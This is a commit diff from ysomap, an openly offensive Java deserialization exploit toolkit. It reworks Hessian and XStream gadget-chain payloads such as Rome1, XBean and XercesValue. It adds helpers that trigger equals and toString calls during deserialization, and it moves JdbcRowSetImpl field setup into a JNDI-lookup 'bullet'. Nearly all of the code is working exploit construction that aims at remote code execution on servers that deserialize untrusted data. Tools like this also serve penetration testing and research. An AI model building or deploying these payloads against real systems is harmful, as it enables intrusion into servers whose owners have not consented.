update Rome1

wh1t3p1g · Oct 14, 2023 · b1ef4a6 · b1ef4a6
1 parent 6c8caf0
commit b1ef4a6
Show file tree

Hide file tree

Showing 9 changed files with 95 additions and 23 deletions.
diff --git a/core/src/main/java/ysomap/bullets/jdk/JdbcRowSetImplBullet.java b/core/src/main/java/ysomap/bullets/jdk/JdbcRowSetImplBullet.java
@@ -4,6 +4,9 @@
 import ysomap.bullets.AbstractBullet;
 import ysomap.bullets.Bullet;
 import ysomap.common.annotation.*;
+import ysomap.core.util.ReflectionHelper;
+
+import java.util.Vector;
 
 /**
  * @author wh1t3P1g
@@ -26,6 +29,15 @@ public class JdbcRowSetImplBullet extends AbstractBullet<JdbcRowSetImpl> {
     public JdbcRowSetImpl getObject() throws Exception {
         JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
         jdbcRowSet.setDataSourceName(jndiURL);
+
+        Vector v = new Vector<String>();
+        v.add("");
+        ReflectionHelper.setFieldValue(jdbcRowSet, "fetchDir", 1);
+        ReflectionHelper.setFieldValue(jdbcRowSet, "concurrency", 1);
+        ReflectionHelper.setFieldValue(jdbcRowSet, "rowSetType", 1);
+        ReflectionHelper.setFieldValue(jdbcRowSet, "iMatchColumns", null);
+        ReflectionHelper.setFieldValue(jdbcRowSet, "strMatchColumns", v);
+        ReflectionHelper.setFieldValue(jdbcRowSet, "resBundle", null);
         return jdbcRowSet;
     }
 

diff --git a/core/src/main/java/ysomap/core/util/CipherHelper.java b/core/src/main/java/ysomap/core/util/CipherHelper.java
@@ -3,6 +3,7 @@
 import javax.crypto.Cipher;
 import javax.crypto.spec.IvParameterSpec;
 import javax.crypto.spec.SecretKeySpec;
+import java.security.Key;
 
 /**
  * @author wh1t3P1g
@@ -21,4 +22,25 @@ public static byte[] encrypt(byte[] plain, byte[] key, byte[] iv){
             return null;
         }
     }
+
+    public static byte[] decrypt(byte[] plain, String key, byte[] iv){
+        try{
+            // AES/GCM/NoPadding
+            // AES/ECB/PKCS5Padding
+            // AES/CBC/PKCS5Padding
+            Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
+            Key speckey = new SecretKeySpec(key.getBytes(), "AES");
+            if(iv != null){
+                IvParameterSpec ivParameterSpec = new IvParameterSpec(iv);
+                cipher.init(Cipher.DECRYPT_MODE, speckey, ivParameterSpec);
+            }else{
+                cipher.init(Cipher.DECRYPT_MODE, speckey);
+            }
+
+            return cipher.doFinal(plain);
+        }catch (Exception e){
+            e.printStackTrace();
+            return null;
+        }
+    }
 }
diff --git a/core/src/main/java/ysomap/core/util/PayloadHelper.java b/core/src/main/java/ysomap/core/util/PayloadHelper.java
@@ -129,7 +129,13 @@ public static HashSet makeHashSetWithEntry(Object entry) throws NoSuchFieldExcep
         return set;
     }
 
-    // triger compareTo function
+    /**
+     * trigger a.compare(b)
+     * @param a
+     * @param b
+     * @return
+     * @throws Exception
+     */
     public static Object makePriorityQueue(Object a, Object b) throws Exception {
         // create queue with numbers and basic comparator
         final PriorityQueue<Object> queue = new PriorityQueue<Object>(2);
@@ -143,7 +149,13 @@ public static Object makePriorityQueue(Object a, Object b) throws Exception {
         return queue;
     }
 
-    public static Object makeTreeSetWithXString(Object obj) throws Exception {
+    /**
+     * trigger obj.toString for non-serializable payload
+     * @param obj
+     * @return
+     * @throws Exception
+     */
+    public static Object makeTreeSetWithXStringToStringTrigger(Object obj) throws Exception {
         Object rdnEntry1 = ReflectionHelper.newInstance("javax.naming.ldap.Rdn$RdnEntry", null);
         ReflectionHelper.setFieldValue(rdnEntry1, "type", "ysomap");
         ReflectionHelper.setFieldValue(rdnEntry1, "value", new XString("test"));
@@ -295,6 +307,35 @@ public static Object makeReadObjectToStringTrigger(Object obj) throws Exception
         return list;
     }
 
+    /**
+     * trigger obj2.equals(obj1)
+     * @param obj1
+     * @param obj2
+     * @return
+     * @throws Exception
+     */
+    public static Object makeHashmapEqualsTrigger(Object obj1, Object obj2) throws Exception {
+        Map<String, Object> map1 = new HashMap<>();
+        Map<String, Object> map2 = new HashMap<>();
+        map1.put("yy", obj1);
+        map1.put("zZ", obj2);
+
+        map2.put("yy", obj2);
+        map2.put("zZ", obj1);
+        return makeMap(map1, map2);
+    }
+
+    /**
+     * trigger obj.toString()
+     * @param obj
+     * @return
+     * @throws Exception
+     */
+    public static Object makeXStringToStringTrigger(Object obj) throws Exception {
+        XString xString = new XString("ysomap");
+        return makeHashmapEqualsTrigger(obj, xString);
+    }
+
     /**
      * 用于创造一个拥有同样hash的对象
      * 这样在map.put过程中将触发equal函数

diff --git a/...in/java/ysomap/payloads/hessian/Rome.java → ...n/java/ysomap/payloads/hessian/Rome1.java b/...in/java/ysomap/payloads/hessian/Rome.java → ...n/java/ysomap/payloads/hessian/Rome1.java
@@ -6,18 +6,18 @@
 import ysomap.core.util.PayloadHelper;
 import ysomap.core.util.ReflectionHelper;
 
-import java.util.Vector;
+import javax.xml.transform.Templates;
 
 /**
  * @author wh1t3p1g
  * @since 2021/8/5
  */
 @Payloads
-@Authors({ Authors.MBECHLER })
-@Targets({Targets.HESSIAN})
-@Require(bullets = {"JdbcRowSetImplBullet"},param = false)
+@Authors({ Authors.MBECHLER, Authors.whocansee})
+@Targets({Targets.HESSIAN, Targets.JDK})
+@Require(bullets = {"JdbcRowSetImplBullet", "TemplatesImplBullet"},param = false)
 @Dependencies({"com.rometools:rome:1.11.1"})
-public class Rome extends HessianPayload{
+public class Rome1 extends HessianPayload{
 
     @Override
     public Bullet getDefaultBullet(Object... args) throws Exception {
@@ -26,17 +26,14 @@ public Bullet getDefaultBullet(Object... args) throws Exception {
 
     @Override
     public Object pack(Object obj) throws Exception {
-        Vector v = new Vector<String>();
-        v.add("");
-        ReflectionHelper.setFieldValue(obj, "fetchDir", 1);
-        ReflectionHelper.setFieldValue(obj, "concurrency", 1);
-        ReflectionHelper.setFieldValue(obj, "rowSetType", 1);
-        ReflectionHelper.setFieldValue(obj, "iMatchColumns", null);
-        ReflectionHelper.setFieldValue(obj, "strMatchColumns", v);
-        ReflectionHelper.setFieldValue(obj, "resBundle", null);
+        Object stringBean = null;
+        if(obj instanceof Templates){
+            stringBean = makeStringBean(Templates.class, obj);
+        }else{
+            Class<?> type = obj.getClass();
+            stringBean = makeStringBean(type, obj);
+        }
 
-        Class<?> type = obj.getClass();
-        Object stringBean = makeStringBean(type, obj);
         Object equalsBean = makeEqualsBean(makeStringBeanClass(), stringBean);
 
 //        ObjectBean delegate = new ObjectBean(type, obj);
@@ -46,7 +43,7 @@ public Object pack(Object obj) throws Exception {
 
         return PayloadHelper.makeMap(equalsBean, "");
 //        return PayloadHelper.makeMap(root, root);
-        // using XString triger to ToStringBean also work
+        // using XString trigger to ToStringBean also work
     }
 
     public Class<?> makeStringBeanClass() throws ClassNotFoundException {

diff --git a/core/src/main/java/ysomap/payloads/hessian/SpringPartiallyComparableAdvisorHolder.java b/core/src/main/java/ysomap/payloads/hessian/SpringPartiallyComparableAdvisorHolder.java
@@ -43,6 +43,6 @@ public Object pack(Object obj) throws Exception {
                 .forName("org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder");
         Object pcah = ReflectionHelper.createWithoutConstructor(pcahCl);
         ReflectionHelper.setFieldValue(pcah, "advisor", advisor);
-        return PayloadHelper.makeTreeSetWithXString(pcah);
+        return PayloadHelper.makeTreeSetWithXStringToStringTrigger(pcah);
     }
 }
diff --git a/core/src/main/java/ysomap/payloads/hessian/XBean.java b/core/src/main/java/ysomap/payloads/hessian/XBean.java
@@ -31,6 +31,6 @@ public Object pack(Object obj) throws Exception {
         Context ctx = ReflectionHelper.createWithoutConstructor(WritableContext.class);
         ContextUtil.ReadOnlyBinding binding = new ContextUtil.ReadOnlyBinding("foo", obj, ctx);
         ReflectionHelper.setFieldValue(binding, "boundObj", null);
-        return PayloadHelper.makeTreeSetWithXString(binding);
+        return PayloadHelper.makeTreeSetWithXStringToStringTrigger(binding);
     }
 }
diff --git a/core/src/main/java/ysomap/payloads/xstream/LazyValueForXStream.java b/core/src/main/java/ysomap/payloads/xstream/LazyValueForXStream.java
@@ -53,7 +53,7 @@ public Object pack(Object obj) throws Exception {
                 ReflectionHelper.newInstance("javax.swing.MultiUIDefaults", new Object[]{new UIDefaults[]{uiDefaults}});
         uiDefaults.put("lazyValue", obj);
 
-        return PayloadHelper.makeTreeSetWithXString(multiUIDefaults);
+        return PayloadHelper.makeTreeSetWithXStringToStringTrigger(multiUIDefaults);
     }
 
 }
diff --git a/core/src/main/java/ysomap/payloads/xstream/XMLMessagePacket.java b/core/src/main/java/ysomap/payloads/xstream/XMLMessagePacket.java
@@ -65,6 +65,6 @@ public Object pack(Object obj) throws Exception {
         ReflectionHelper.setFieldValue(msg, "bodyParts", new ArrayList<Element>());
         ReflectionHelper.setFieldValue(packet, "satellites", null);
         ReflectionHelper.setFieldValue(packet, "viewthis", null);
-        return PayloadHelper.makeTreeSetWithXString(packet);
+        return PayloadHelper.makeTreeSetWithXStringToStringTrigger(packet);
     }
 }
diff --git a/core/src/main/java/ysomap/payloads/xstream/XercesValue.java b/core/src/main/java/ysomap/payloads/xstream/XercesValue.java
@@ -86,7 +86,7 @@ public Object pack(Object obj) throws Exception {
         XRTreeFrag xrTreeFrag = new XRTreeFrag(1, new XPathContext());
         ReflectionHelper.setFieldValue(xrTreeFrag, "m_DTMXRTreeFrag", dtmxrTreeFrag);
 
-        return PayloadHelper.makeTreeSetWithXString(xrTreeFrag);
+        return PayloadHelper.makeTreeSetWithXStringToStringTrigger(xrTreeFrag);
     }
 
 }